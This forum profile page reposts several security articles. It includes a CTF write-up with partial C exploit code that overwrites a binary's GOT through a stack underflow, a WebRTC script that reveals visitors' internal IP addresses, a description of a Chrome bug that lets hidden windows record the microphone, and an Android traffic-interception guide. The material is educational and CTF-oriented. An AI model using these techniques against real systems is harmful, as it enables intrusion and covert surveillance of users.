Jump to content

Nytro

Administrators
  • Posts

    18715
  • Joined

  • Last visited

  • Days Won

    701

Everything posted by Nytro

  1. Shmooganography 2014 Posted on January 24, 2014 by Brian Cardinale This past weekend I attended ShmooCon 2014, which is an annual east coast hacking conference where like minded, and sometimes unlike minded people gather to exchange ideas and have a generally good time. The conference provides a forum for various speakers to present their research. Among the varying and interesting talks presented there are also many contests around the conference. There are a number of Capture the Flag (CTF) contests involving wireless, binary reversing, trivia and cryptography as well as steganography, which is the practice of hiding a message in plain site. We took a crack at the steganography challenge and here is an outline of our experience and thought process. Shmooganography was announced at the opening ceremony and we were told to investigate a huge Star Gate portal at the other end of the con. There to be was found a large Star Gate portal made out of printed cardboard cutouts and Christmas lights which were pulsating to the sound of the Star Gate theme music playing repeatedly. Also, there was a bar code scanner with the instruction to scan your registration bar code to determine which Star Gate character out of 5 you were. Conferences promote social interaction within and outside the community and this first challenge promoted this social interaction. In order to obtain the first glyph, five bar codes need to be scanned that would render the five different Star Gate characters and render the first glyph, which ended up being Scorpio, and the next clue. “The dial spins and chevrons are engaged. Getting the order correct yields the next generation” The next clue lead to investigating the four card board Shmooganography posters scattered across the Washington Hilton conference area that featured an ancient Star Gate with nine chevrons. The poster had nine chevrons either fully colored red or partially colored. The nine chevrons then pointed to 8 boxes on the right hand side, one chevron being disconnected. The color of the chevrons and the order changed between the posters. During this part of the challenge a hint was released on the Shmooganography site. “Stage 2: What the chevron on each gate points to doesn’t matter as much as whether it is on. Or off. Or connected at all. “ On and off was a big hint indicating the chevrons were a binary representation with 8 positions, which can yield the numbers 0-255. This information coupled with the 4 separate signs indicated that we had 4 sets of 8 binaries which bares a striking resemblance to the description of an IP address. The order of the numbers played a roll, but the number of positions didn’t limit the ability to guess. Another clue was released to provide the proper order as no one as making it past these phase in any timely manner. None of the IP addresses we derived were responding to network traffic or even in this country which made the whole decoding process questionable. There was a lot of head scratching at this point. We hit a wall. Then this hint was posted: “Stage 2: The chevrons are broken. The creator made a mistake. They should decode to 205.134.172.239 (when put in order). Still refer to the previous hints to know what to do with this information.” Please return your chair to the upright and vertical positions. OK, so now there is a working IP address, finally. Time to investigate what is listening at the other end. Here is where nmap is your friend! A couple web ports are open, all of which redirect to ShmooCon 2014 - January 17-19 - Welcome. The last hint said to refer to previous hints. “Stage 2: Need to echo a change of host… URL – CON + COM – ORG” This was interpreted as adding an entry into our hosts files for the newly acquired IP address. Using the math provided by the hint, “con” and “com” get removed from from “www.shmoocon.org”, and “com” gets added yielding “www.shmoo.com”. The host file was updated to The Shmoo Group to 205.134.172.239. Now, the IP address returns the shmoo.com homepage, but no further clues to the game, back to the hints. “Stage 2: Know your glyphs! Start with Earth in the northeast corner. Take it from there. First letter each, upper case. Don’t forget Hint #2. “ Earth was one of the glyths in the poster boards that were not connected to a position. The other glyths not connected to a position on the board were: Orion, Hydra, Equuleus, Capricornus. The capital first letters of which spell out ECHO. Time to try: www.shmoo.com/ECHO Bingo! The clue was vague. Port knocking was a theory. If we connected to two separate ports, another may appear. At this time we broke out and went to the ShmooCon Reception to go cash in on our free drinks. Thanks ShmooGroup! At the reception, we were able to talk to the organizer of the contest and air our, er, frustrations over the IP address and learn a little about them. They were genuinely cool guys and this information might come in handy later. So, remember its important to socialize at cons for all sorts of reasons! The next morning we went back down the Star Gate to try to decode the next clue. Another hint was released: “Stage 3: The black hole casts a hue; but it is sound which activates its data transfer. That Gate music has a nice beat to it. “ There were two boxes in the area that black lights in them, which satisfied the “black hole” and “hue” part, but how to activate them with sound was not obvious. There was a black device taped inside the box, but no visible serial numbers. We attempted to play the Star Gate theme music into the box to see if the black light would start flashing morse code, but alas no luck. Referring back to the SAGITTARIUS clue concerning two gates being connected we decided to start rhythmically tapping both boxes to see what happens. After a few moments, there was audio coming out of one of the boxes and squeals coming out of me. We activated the portal! The sound the played was an audio clip from the show Star Gate which read the following: “Humans and material obviously traverse the wormholes, but the event horizon conveys much more.” 00:00 00:00 Also in the clip was audible noise. A signal! We recorded the message and broke off to some place quiet to start decoding the signal. Loading the recorded file in Audacity and switching to the spectrogram view yields the following. There is clearly data inside this file! The question is how is it encoded? An important lesson in these challenges is to try and not over think things, but that didn’t stop us from diving deep into the rabbit hole looking into signal encoding. There are 27 positions of data which is odd for computer signals to not have an even number. The frequency of the signals also did not correlate to DTMF tones which was an early theory we held. We were stumped. Then another clue was released. “10: Stage 3: Don’t be hexed by pieces of eight. “ Easy for you to say, game maker! At this point the conference closing ceremony was coming upon us as well as the end of the time frame allowed for the challenge and we have yet still to determine the data. It was actually a good clue we later realized at the closing ceremonies. I believe the signal was a representation of octal if I recall correctly. Its a little fuzzy as we were drinking our woes away for being beat by an eleven year old! We may have worked against ourselves, and pointed him in the direction of the portals with the audio signal, cause that’s what this experience was all about learning something new and helping others learn it to! Congrats, Kid! We’ll get you next year! Sursa: Shmooganography 2014 | Cardinale Concepts
  2. Ghost in the Shellcode: TI-1337 (Pwnable 100) Hey everybody, This past weekend was Shmoocon, and you know what that means—Ghost in the Shellcode! Most years I go to Shmoocon, but this year I couldn't attend, so I did the next best thing: competed in Ghost in the Shellcode! This year, our rag-tag band of misfits—that is, the team who purposely decided not to ever decide on a team name, mainly to avoid getting competitive—managed to get 20th place out of at least 300 scoring teams! I personally solved three levels: TI-1337, gitsmsg, and fuzzy. This is the first of three writeups, for the easiest of the three: TI-1337—solved by 44 teams. You can download the binary, as well as the exploit, the IDA Pro files, and everything else worth keeping that I generated, from my Github repository. Getting started Unlike some of my teammates, I like to dive head-first into assembly, and try not to drown. So I fired up IDA Pro to see what was going on, and I immediately noticed is that it's a 64-bit Linux binary, and doesn't have a ton of code. Having never in my life written a 64-bit exploit, this would be an adventure! Small aside: Fork this! I'd like to take a quick moment to show you a trick I use to solve just about every Pwn-style CTF level: getting past that pesky fork(). Have you ever been trying to debug a vuln in a forking program? You attach a debugger, it forks, it crashes, and you never know. So you go back, you set affinity to 'child', you debug, the debugger follows the child, catches the crash, and the socket doesn't get cleaned up properly? It's awful! There is probably a much better way to do this, but this is what I do. First, I load the binary into IDA and look for the fork() call: .text:00400F65 good_connection: ; CODE XREF: do_connection_stuff+39j .text:00400F65 E8 06 FD FF FF call _fork .text:00400F6A 89 45 F4 mov [rbp+child_pid], eax .text:00400F6D 83 7D F4 FF cmp [rbp+child_pid], 0FFFFFFFFh .text:00400F71 75 02 jnz short fork_successful You'll note that opcode bytes are turned on, so I can see the hex-encoded machine code along with the instruction. The call to fork() has the corresponding code e8 06 fd ff ff. That's what I want to get rid of. So, I open the binary in a hex editor, such as 'xvi32.exe', search for that sequence of bytes (and perhaps some surrounding bytes, if it's ambiguous), and replace it with 31 c0 90 90 90. The first two bytes—31 c0—is "xor eax, eax" (ie, clear eax), and 90 90 90 is "nop / nop / nop". So basically, the function does nothing and returns 0 (ie, behaves as if it's the child process). You may want to kill the call to alarm(), as well, which will kill the process if you spend more than 30 seconds looking at it. You can replace that call with 90 90 90 90 90—it doesn't matter what it returns. I did this on all three levels, and I renamed the new executable "<name>-fixed". You'll find them in the Github repository. I'm not going to go over that again in the next two posts, but I'll be referring back to this instead. The program Since this is a post on exploitation, not reverse engineering, I'm not going to go super in-depth into the code. Instead, I'll describe it at a higher level and let you delve in more deeply if you're interested. The main handle_connection() function can be found at offset 0x00401567. It immediately jumps to the bottom, which is a common optimization for a 'for' or 'while' loop, where it calls the code responsible for receiving data—the function at 0x00401395. After receiving data, it jumps back to the top of handle_connection() function, just after the jump to the bottom, where it goes through a big if/else list, looking for a bunch of symbols (like '+', '-', '/' and '*'—look familiar?) After the if/else list, it goes back to the receive function, then to the top of the loop, and so on. Receive, parse, receive, parse, etc. Let's look at those two pieces separately, then we'll explore the vulnerability and see the exploit. Receive As I mentioned above, the receive function starts at 0x00401395. This function starts by reading up to 0x100 (256) bytes from the socket, ending at a newline (0x0a) if it finds one. This is done using a simple receive-loop function located at 0x0040130E that is worthwhile going through, if you're new to this, but that doesn't add much to the exploit. After reading the input, it's passed to sscanf(buffer, "%lg", ...). The format string "%lg" tells sscanf() to parse the input as a "double" variable—a 64-bit floating point. Great: a x64 process handling floating point values; that's two things I don't know! If the sscanf() fails—that is, the received data isn't a valid-looking floating point value—the received data is copied wholesale into the buffer. A flag at the start of the buffer is set indicating whether or not the double was parsed. Then the function returns. Quite simple! Processing the data I mentioned earlier that this binary looks for mathematical symbols—'+', '-', '*', '/' in the received data. I didn't actually notice that right away, nor did the name "TI-1337" (or the fact that it used port "31415"... think about it) lead me to believe this might be a calculator. I'm not the sharpest pencil sometimes, but I try hard! Anyway, back to the main parsing code (near the top of the function at 0x00401567 again)! The parsing code is actually divided into two parts: a short piece of code that runs if a valid double was received (ie, the sscanf() worked), and a longer one that runs if it wasn't a double. The short piece of code simply calls a function (spoiler alert: the function pushes it onto a global stack object they use, not to be confused with the runtime stack). The longer one performs a bunch of string comparisons and does soemthing based on those. I think at this point I'll give away the trick: whole application is a stack-based calculator. It allocates a large chunk of memory as a global variable, and implements a stack (a length followed by a series of 64-bit values). If you enter a double, it's pushed onto the stack and the length is incremented. If you enter one of a few symbols, it pops one or more values (without checking if we're at the beginning!), updates the length, and performs the calculation. The new value is then pushed back on top of the stack. Here's an example session: (sent) 10 (sent) 20 (sent) + (sent) . (received) 30 And a list of all possible symbols: + :: pops the top two elements off the stack, adds them, pushes the result - :: same as '+', except it subtracts * :: likewise, multiplication / :: and, to round it out, division ^ :: exponents ! :: I never really figured this one out, might be a bitwise negation (or might not, it uses some heavy floating point opcodes that I didn't research ) . :: display the current value b :: display the current value, and pop it q :: quit the program c :: clear the stack And, quite honestly, that's about it! That's how it works, let's see how to break it! The vulnerability As I alluded to earlier, the program fails to check where on the stack it currently is when it pops a value. That means, if you pop a value when there's nothing on the stack, you wind up with a buffer underflow. Oops! That means that if we pop a bunch of times then push, it's going to overwrite something before the beginning of the stack. So where is the stack? If you look at the code in IDA, you'll find that the stack starts at 0x00603140—the .bss section. If you scroll up, before long you'll find this: .got.plt:00603018 off_603018 dq offset free ; DATA XREF: _freer .got.plt:00603020 off_603020 dq offset recv ; DATA XREF: _recvr .got.plt:00603028 off_603028 dq offset strncpy ; DATA XREF: _strncpyr .got.plt:00603030 off_603030 dq offset setsockopt ; DATA XREF: _setsockoptr ... The global offset table! And it's readable/writeable! If we pop a couple dozen times, then push a value of our choice, we can overwrite any entry—or all entries—with any value we want! That just leaves one last step: where to put the shellcode? Aside: floating point One gotcha that's probably uninteresting, but is also the reason that this level took me significantly longer than it should have—the only thing you can push/pop on the application's stack is 64-bit double values! They're read using "%lg", but if I print stuff out using printf("%lg", address), it would truncate the numbers! Boo! After some googling, I discovered that you had to raise printf's precision a whole bunch to reproduce the full 64-bit value as a decimal number. I decided that 127 decimal places was more than enough (probably like 5x too much, but I don't even care) to get a good result, so I used this to convert a series of 8 bytes to a unique double: sprintf(buf, "%.127lg\n", d); I incorporated that into my push() function: /* This pushes an 8-byte value onto the server's stack. */void do_push(int s, char *value) { char buf[1024]; double d; /* Convert the value to a double */ memcpy(&d, value, 8); /* Turn the double into a string */ sprintf(buf, "%.127lg\n", d); printf("Pushing %s", buf); /* Send it */ if(send(s, buf, strlen(buf), 0) != strlen(buf)) perror("send error!"); } And it worked perfectly! The exploit Well, we have a stack (one again, not to be confused with the program's stack) where we can put shellcode. It has a static memory address and is user-controllable. We also have a way to encode the shellcode (and addresses) so we wind up with fully controlled values on the stack. Let's write an exploit! Here's the bulk of the exploit: int main(int argc, const char *argv[]){ char buf[1024]; int i; int s = get_socket(); /* Load the shellcode */ for(i = 0; i < strlen(shellcode); i += 8) do_push(s, shellcode + i); /* Pop the shellcode (in retrospect, this could be replaced with a single 'c') */ for(i = 0; i < strlen(shellcode); i += 8) do_pop(s); /* Pop until we're at the recv() call */ for(i = 0; i < 38; i++) do_pop(s); do_push(s, TARGET); /* Send a '.' just so I can catch it */ sprintf(buf, ".\n"); send(s, buf, strlen(buf), 0); sleep(100); return 0; } ou can find the full exploit here! Conclusion And that's all there is to it! Just push the shellcode on the stack, pop our way back to the .got.plt section, and push the address of the stack. Bam! Execution! That's all for now, stay tuned for the much more difficult levels: gitsmsg and fuzzy! January 24, 2014 Ron Bowes Sursa: https://blog.skullsecurity.org/2014/ghost-in-the-shellcode-ti-1337-pwnable-100
  3. [h=3]Android Assessments with GenyMotion + Burp[/h]s much as I love Android app assessments, I kept coming across the same problem: Do I waste time trying to ‘root’ an Android device or deal with the incredibly buggy, slow, unresponsive, and overly difficult to work with Android emulator that comes with the Android SDK bundle? Then I was introduced to Genymotion: an Android emulator based on the AndroVM Open Source project (AndroVM blog | Running Android in a Virtual Machine). Genymotion utilizes VirtualBox to run an Android OS within a Virtual Machine. This results in a drastic increase in speed, response, stability, and ease of use. I've been working with Genymotion for a little while now and wanted to compile a bunch of things I've learned how to do in order to make it easier for others to have a consolidated resource. Downloading and Installing Genymotion Standing up a new Android OS VM Useful features within Genymotion (Drag & Drop, etc.) Using ADB with Genymotion to install applications Configure the Android VM to pass all web traffic through Burp Using ADB with Genymotion to install a Burp SSL Certificate Troubleshooting ARM error and adding Google Play support within Genymotion Upon installation you are prompted to provide the same credentials that were created to login and download Genymotion. This will let you connect to the Genymotion cloud and download a pre-built Android VM. My Android testing environment consists of a MacBook Pro although all of the tools/techniques used in this post are platform independent. I am also going to use Burp Suite Pro and Free 1.5 which is also platform independent. Lastly, while I talk about utilizing the Android SDK/ADT/ADB and installing APK applications, I do not cover how to set up your Android SDK/ADT/ADB or find APK applications outside of Google Play. Downloading and Installing Genymotion: Genymotion requires the use of VirtualBox. The Windows 32/64 bit download of Genymotion comes with VirtualBox however, the OS X and Linux versions do not and therefore it must be installed separately. The link can be found here. VirtualBox must be installed first, before the installation of Genymotion. In order to download Genymotion, a free sign-up is required. Once the email address on the account has been verified a link to download Genymotion can be accessed. The link to sign up and download Genymotion can be found here. Standing up a new Android OS VM: Select 'Galaxy Nexus - 4.3 - API 18 - 720x1280' Click 'Next'. The VM will automatically downloaded from the Genymotion cloud. Once the download is complete and the VM has been successfully installed within VirtualBox it should be listed under 'Your Virtual Devices'. Click the 'Play' Button to run the VM for the first time. If everything is successful the VM should be running. Useful Features within Genymotion: This feature list is not all inclusive however I wanted to point out a few features I found to be useful when setting up my environment. In addition, I want to point out that for developers - Genymotion has an IntelliJ IDEA plugin as well as an Eclipse plugin to be able to push the app you are developing directly to your Android VM through ADB. By clicking on the 'Settings' icon the Genymotion settings menu will appear. Under the 'Network' Tab are proxy settings for Genymotion to be able to reach out to its cloud service and download new VMs and updates. NOTE: This setting is NOT for configuring the Android VM to send web traffic through a proxy. That will be covered in a later section. Under the ADB Tab you can point Genymotion to the SDK directory within your Android development environment. Within the Android VM, Genymotion installs a configuration application that allows for some environment modifications. Since the VM is already 'rooted' there are not a lot of configuration settings that need to be modified on this screen however, it is useful to enable the use of the physical keyboard for input. If any settings are modified within this application the VM will require a reboot. The last and most useful feature within Genymotion is the drag and drop feature. This feature can be used to transfer files and install applications to the Android VM environment. Simply drag a file from the host's desktop or a folder directly into the Android VM. Once the file transfer is complete the Android OS will notify the user where the file is located within the OS (by default it is '/sdcard/Download'). Using ADB to Install Applications: ADB can be used to push and pull files as well as install Android applications. However, as mentioned in the section above, the ADB environment path must be properly specified within Genymotion. Using ADB commands verify that a device is listed. Then using the syntax of ./adb install <path/to/.apk_file>, install the Android Application. If the installation is successful ADB will prompt 'Success' upon completion. The newly installed application should now be available for use within the Android VM. However, an easier way of installing Android Applications into the Android VM is to simply utilize Genymotions drag and drop feature. Simply drag and drop an APK file into the VM and the application should install successfully and be ready for use within the VM environment. Configure the Android VM Proxy and Burp: For performing security assessments as well as validating an application in development it is necessary to view the web traffic that is passed back and forth between the client (android application installed on an end device) and its corresponding server. It is possible to configure the Android VM within Genymotion to pass all of its web traffic through a web proxy such as Burp. Verify the current IP address of the host machine. In the instance above, the IP address of the host machine is: 192.168.1.11. We will later set the proxy within the Android VM to this IP address. Within the Android VM go to Settings. Cick on Wi-Fi. Click and hold 'WiredSSID' until a box pops up. Click on 'Modify network'. Check the 'Show advanced options' box and select 'Manual' from the Proxy Settings menu. Specify the host IP address and set a default port for the proxy to listen on. In this case my host IP was 192.168.1.11 and the listening port was 8080. When those changes have been made click 'Save' and exit out of Settings. At this point the Android VM should be completely configured to pass web traffic to the web proxy. However, the web proxy must be configured to listen on the host IP we specified within the Android VM. For the purposes of this blog I chose to use Burp Suite as it is one of the most common and widely used web proxies around. Launch Burp Suite Pro or Free. Click on the top 'Proxy' tab then click on the 'Options' secondary tab. Lastly, click on the 'Add' button to add a new proxy listener. Specify the listener port that we defined within the Android VM (in our case port 8080). Also, click on the 'Specific address' radio button and from the drop down select the IP address specified within the Android VM (in our case it was 192.168.1.11). When complete click 'OK' to return to the previous screen. Verify that the new proxy listener has been added and that a check box is located next to the listener to ensure it is enabled. If all of the settings were configured properly Burp should now be seeing web traffic passed to it by the Android VM. If traffic is still not being passed the IP address of the host should be verified as the DHCP lease may have run out and the IP address may have changed. Installing SSL Certificate with ADB: Until this point all web traffic should be passing from the Android VM to Burp. However, if any applications are communicating over HTTPS, you will receive a 'Webpage not Available' error. This happens because the burp Certificate Authority (CA) Certificate is not yet trusted by the Android VM. There are two methods of retrieving the Burp CA Certificate in order to install it on the Android VM. If you have the free version of Burp: Open up Burp and enable the loopback (127.0.0.1) listener on port 8080 if it is not already enabled. Open up Firefox on your host machine. Go to Firefox's Preferences and under the 'Advanced' tab in the 'Connection' section click on 'Settings'. Click on the 'Manual proxy configuration' radio button. Specify the loopback address (127.0.0.1) and specify port 8080 as the listening port. Click 'OK' and exit out of the Preferences. Go to any HTTPS based website. For this example I chose ( https://google.com). You will receive a Connection Untrusted message. Click on the 'Add Exception' button on the bottom. Click on the 'View' button to view the identity of the Certificate. Click on the 'Details' tab and notice that the Certificate references PortSwigger CA which is the CA for Burp. Click 'Export' to export the Certificate. Change the format to 'X.509 Certificate (DER)' and name the Certificate <name>.cer. Save the Certificate to an easily accessible location. If you have the Professional Version of Burp, c lick on the 'Proxy' tab and the 'Options' secondary tab. Click on the 'CA certificate' button. Export as 'Certificate in DER format'. Click 'Next'. Name the Certificate <name>.cer. Save it in an easily accessible location. Next we will get the certificate onto the Android VM and install it. There are two methods of getting the Certificate onto the Android VM. The first one is by using ADB. We will use the 'adb push' command to push the Certificate onto the '/mnt/sdcard' directory of the Android VM. The syntax is: adb push <local/path/to/certifiate> </mnt/sdcard/>. We can also verify that the Certificate has been transferred over successfully by entering into a shell of the Android VM by using the 'adb shell' command and listing the contents of the /mnt/sdcard/ directory. The second method of getting the Certificate onto the Android VM is to use the drag and drop feature. Drag and drop the Certificate file into the Android VM and the file should copy over and be located within the /mnt/sdcard/ directory. Now that the Certificate is on the Android VM we can install it. In your Android VM go to 'Settings'. Click on 'Security' Click on 'Install from SD card' A box will pop up with the Certificate information. Verify it and then click 'OK'. Android requires you to set a password in order to use credential storage. Click 'OK'. This password can be pattern based, a PIN, or a password. Select one and set it. The PortSwigger CA Certificate should now be installed on your Android VM. To verify that the CA Certificate successfully was installed click on 'Trusted credentials'. Click on the 'User' tab. The PortSwigger CA Certificate should now be there signifying it was successfully installed on your Android VM. You should now be able to successfully view HTTPS traffic in plain text. Troubleshooting ARM error and adding Google Play support within Genymotion: The support for ARM applications and Google Play was removed within Genymotion starting with their 2.0 release. However, since a decent number of applications available require ARM translation this can be a major pain. When attempting to install an ARM based application you should see the error below. The guys over at XDA-Developers have found a way to recover the functionality of both ARM based applications as well as Google Play. The entire thread and download files can be found here. Simply download the ARM Translation Install zip file and the Google Play application zip file (depending on which version of Android you are running within your VM). Drag and drop each file into your Android VM and that should do it. We hope this information is useful and eases some of the pain of Android application assessments. We'd love to hear your thoughts. Posted by Abdullah Munawar Sursa: nVisium: Android Assessments with GenyMotion + Burp
  4. Nytro

    Get NAT IP

    <body> Your network IP is: <h1 id=list>-</h1> source: <a href="http://net.ipcalf.com/">Make the locals proud.</a> <script> // NOTE: window.RTCPeerConnection is "not a constructor" in FF22/23 var RTCPeerConnection = /*window.RTCPeerConnection ||*/ window.webkitRTCPeerConnection || window.mozRTCPeerConnection; if (RTCPeerConnection) (function () { var rtc = new RTCPeerConnection({iceServers:[]}); if (window.mozRTCPeerConnection) { // FF needs a channel/stream to proceed rtc.createDataChannel('', {reliable:false}); }; rtc.onicecandidate = function (evt) { if (evt.candidate) grepSDP(evt.candidate.candidate); }; rtc.createOffer(function (offerDesc) { grepSDP(offerDesc.sdp); rtc.setLocalDescription(offerDesc); }, function (e) { console.warn("offer failed", e); }); var addrs = Object.create(null); addrs["0.0.0.0"] = false; function updateDisplay(newAddr) { if (newAddr in addrs) return; else addrs[newAddr] = true; var displayAddrs = Object.keys(addrs).filter(function (k) { return addrs[k]; }); document.getElementById('list').textContent = displayAddrs.join(" or perhaps ") || "n/a"; } function grepSDP(sdp) { var hosts = []; sdp.split('\r\n').forEach(function (line) { // c.f. http://tools.ietf.org/html/rfc4566#page-39 if (~line.indexOf("a=candidate")) { // http://tools.ietf.org/html/rfc4566#section-5.13 var parts = line.split(' '), // http://tools.ietf.org/html/rfc5245#section-15.1 addr = parts[4], type = parts[7]; if (type === 'host') updateDisplay(addr); } else if (~line.indexOf("c=")) { // http://tools.ietf.org/html/rfc4566#section-5.7 var parts = line.split(' '), addr = parts[2]; updateDisplay(addr); } }); } })(); else { document.getElementById('list').innerHTML = "<code>ifconfig | grep inet | grep -v inet6 | cut -d\" \" -f2 | tail -n1</code>"; document.getElementById('list').nextSibling.textContent = "In Chrome and Firefox your IP should display automatically, by the power of WebRTCskull."; } </script> </body> Sursa: Edit fiddle - JSFiddle (+Demo)
  5. 4 HTTP Security headers you should always be using 23-01-2014 Boy Baukema What started as a dream for a worldwide library of sorts, has transformed into not only a global repository of knowledge but also the most popular and widely deployed Application Platform: the World Wide Web. The poster child for Agile, it was not developed as a whole by a single entity, but rather grew as servers and clients expanded it's capabilities. Standards grew along with them. While growing a solution works very well for discovering what works and what doesn't, it hardly leads to a consistent and easy to apply programming model. This is especially true for security: where ideally the simplest thing that works is also the most secure, it is far too easy to introduce vulnerabilities like XSS, CSRF or Clickjacking. Because HTTP is an extensible protocol browsers have pioneered some useful headers to prevent or increase the difficulty of exploiting these vulnerabilities. Knowing what they are and when to apply them can help you increase the security of your system. 1. Content-Security-Policy What's so good about it? How would you like to be largely invulnerable to XSS? No matter if someone managed to trick your server into writing <script>alert(1);</script>, have the browser straight up refuse it? That's the promise of Content-Security-Policy. Adding the Content-Security-Policy header with the appropriate value allows you to restrict the origin of the following: script-src: JavaScript code (biggest reason to use this header) connect-src: XMLHttpRequest, WebSockets, and EventSource. font-src: fonts frame-src: frame ulrs img-src: images media-src: audio & video object-src: Flash (and other plugins) style-src: CSS So specifying the following: Content-Security-Policy: script-src 'self' https://apis.google.comMeans that script files may only come from the current domain or from apis.google.com (the Google JavaScript CDN). Another helpful feature is that you can automatically enable sandbox mode for all iframes on your site. And if you want to test the waters, you can use use the 'Content-Security-Policy-Report-Only' header to do a dry run of your policy and have the browser post the results to a URL of your choosing. It is definitely worth the time to read the excellent HTML5Rocks introduction. Articol complet: http://ibuildings.nl/blog/2013/03/4-http-security-headers-you-should-always-be-using
  6. SSL Labs: Stricter security requirements for 2014 January 21, 2014 Today, we're releasing a new version of SSL Rating Guide as well as a new version of SSL Test to go with it. Because the SSL/TLS and PKI ecosystem continues to move at a fast pace, we have to periodically evaluate our rating criteria to keep up. We have made the following changes: Support for TLS 1.2 is now required to get an A. If this protocol version is not supported, the grade is capped at B. Given that, according to SSL Pulse, TLS 1.2 is supported by only about 20% servers, we expect this change to affect a large number of assessments. Keys below 2048 bits are now considered weak, with the grade capped at B. Keys below 1024 bits are now considered insecure, and given an F. MD5 certificate signatures are now considered insecure, and given an F. We introduce two new grades, A+ and A-, to allow for finer grading. This change allows us to reduce the grade slightly, when we don't want to reduce it to a B, but we still want to show a difference. More interestingly, we can now reward exceptional configurations. We also introduce a concept of warnings; a server with good configuration, but with one ore more warnings, is given a reduced grade A-. Servers that do not support Forward Secrecy with our reference browsers are given a warning. Servers that do not support secure renegotiation are given a warning. Servers that use RC4 with TLS 1.1 or TLS 1.2 protocols are given a warning. This approach allows those who are still concerned about BEAST to use RC4 with TLS 1.0 and earlier protocols (supported by older clients), but we want them to use better ciphers with protocols that are not vulnerable to BEAST. Almost all modern clients now support TLS 1.2. Servers with good configuration, no warnings, and good support for HTTP Strict Transport Security (long max-age is required), are given an A+. I am very happy that our rating approach now takes into account some very important features, such as TLS 1.2, Forward Secrecy, and HSTS. Frankly, these changes have been overdue. We originally meant to have all of the above in a major update to the rating guide, but we ran out of time, and decided to implement many of the ideas in a patch release. Sursa: Ivan Risti?: SSL Labs: Stricter security requirements for 2014
  7. Windbgshark This project includes an extension for the windbg debugger as well as a driver code, which allow you to manipulate the virtual machine network traffic and to integrate the wireshark protocol analyzer with the windbg commands. The motivation of this work came from the intention to find a handy general-purpose way to debug network traffic flows under the Windows OS for the purposes of dynamic software testing for vulnerabilities, for reverse engineering of software and just for fun. Theory of operation The main idea is to rely on the Windows Filtering Platform capability to inspect traffic at the application level of OSI (however, the method works well on any level introduced by the WFP API). This gives us a way to intercept and modify any data, which goes through the Windows TCP/IP stack (even the localhost traffic), regardless of the application type and transport/network protocol. Modification and reinjection also work excellent: the operating systems does all the dirty work, reconstructing the transport and network layer headers, for example, as if we were sending the data from the usermode winsock application. This tool needs a virtualized enviroment (it works fine with VMWare Workstation now) with windbg connected to the virtual machine as a kernel debugger. Installation is done in two steps: driver installation and extension loading in windbg. Driver intercepts network traffic, allows the windbg to modify it, and then reinjects packets back into the network stack. The extension on its turn implements simple interface for packet edit and also uses Wireshark to display data flows. The extension is executed on the host machine, while the driver is located on the virtual machine. To interact with its driver, windbg extension sets the corresponding breakpoints with its own callbacks right inside the driver code. Every time a packet comes in or out, a breakpoint is hit and the windbgshark extracts the app-level payload of the current packet, constructs a new pcap record and sends it to Wireshark. Before the packet is reinjected back, user may modify it, and the Wireshark will re-parse and show the modified record. Build Source code is presented as a Visual Studio 2010 solution with both projects, Windows Driver Kit Download Windows Hardware Kits and Tools is required to build this solution. You can buld either from the command line or from the Visual Studio (Ctrl + , all the necessary makefiles come along with the source code. Install First, you need to prepare your VMWare virtual machine to interact with the kernel debugger. This task is covered in Kernel Debugging with WinDbg Host and Target in Virtual Machines, this tool VisualDDK - Create and debug driver projects directly from Visual Studio simplifies this process a bit. You also need to set up a correct symbol path in windbg, pointing to the windbgshark_drv.pdb (debugging symbols for the driver). When the windbg is set up, you need to install and start the driver windbgshark_drv.sys, .inf file is included in this project. Start the driver, for example, from the command-line: sc start windbgshark_drv After that you can load the windbgshark library in windbg. Copy the dll to a location that can be found by your windbg, and type in the command window: !load windbgshark. The library should start the wireshark (now its path is hardcoded, you should have the executable C:\Program files\Wireshark\Wireshark.exe on the host machine). Type !windbgshark.help to get the list of commands and start playing with the tool. Sursa: https://code.google.com/p/windbgshark/
  8. Chrome Bugs Allow Sites to Listen to Your Private Conversations By exploiting bugs in Google Chrome, malicious sites can activate your microphone, and listen in on anything said around your computer, even after you’ve left those sites. Even while not using your computer - conversations, meetings and phone calls next to your computer may be recorded and compromised. While we’ve all grown accustomed to chatting with Siri, talking to our cars, and soon maybe even asking our glasses for directions, talking to our computers still feels weird. But now, Google is putting their full weight behind changing this. There’s no clearer evidence to this, than visiting Google.com, and seeing a speech recognition button right there inside Google’s most sacred real estate - the search box. Yet all this effort may now be compromised by a new exploit which lets malicious sites turn Google Chrome into a listening device, one that can record anything said in your office or your home, as long as Chrome is still running. Check out the video, to see the exploit in action Google’s Response I discovered this exploit while working on annyang, a popular JavaScript Speech Recognition library. My work has allowed me the insight to find multiple bugs in Chrome, and to come up with this exploit which combines all of them together. Wanting speech recognition to succeed, I of course decided to do the right thing… I reported this exploit to Google’s security team in private on September 13. By September 19, their engineers have identified the bugs and suggested fixes. On September 24, a patch which fixes the exploit was ready, and three days later my find was nominated for Chromium’s Reward Panel (where prizes can go as high as $30,000.) Google’s engineers, who’ve proven themselves to be just as talented as I imagined, were able to identify the problem and fix it in less than 2 weeks from my initial report. I was ecstatic. The system works. But then time passed, and the fix didn’t make it to users’ desktops. A month and a half later, I asked the team why the fix wasn’t released. Their answer was that there was an ongoing discussion within the Standards group, to agree on the correct behaviour - “Nothing is decided yet.” As of today, almost four months after learning about this issue, Google is still waiting for the Standards group to agree on the best course of action, and your browser is still vulnerable. By the way, the web’s standards organization, the W3C, has already defined the correct behaviour which would’ve prevented this… This was done in their specification for the Web Speech API, back in October 2012. How Does it Work? A user visits a site, that uses speech recognition to offer some cool new functionality. The site asks the user for permission to use his mic, the user accepts, and can now control the site with his voice. Chrome shows a clear indication in the browser that speech recognition is on, and once the user turns it off, or leaves that site, Chrome stops listening. So far, so good. But what if that site is run by someone with malicious intentions? Most sites using Speech Recognition, choose to use secure HTTPS connections. This doesn’t mean the site is safe, just that the owner bought a $5 security certificate. When you grant an HTTPS site permission to use your mic, Chrome will remember your choice, and allow the site to start listening in the future, without asking for permission again. This is perfectly fine, as long as Chrome gives you clear indication that you are being listened to, and that the site can’t start listening to you in background windows that are hidden to you. When you click the button to start or stop the speech recognition on the site, what you won’t notice is that the site may have also opened another hidden popunder window. This window can wait until the main site is closed, and then start listening in without asking for permission. This can be done in a window that you never saw, never interacted with, and probably didn’t even know was there. To make matters worse, even if you do notice that window (which can be disguised as a common banner), Chrome does not show any visual indication that Speech Recognition is turned on in such windows - only in regular Chrome tabs. You can see the full source code for this exploit on GitHub. Speech Recognition's Future Speech recognition has huge potential for launching the web forward. Developers are creating amazing things, making sites better, easier to use, friendlier for people with disabilities, and just plain cool… As the 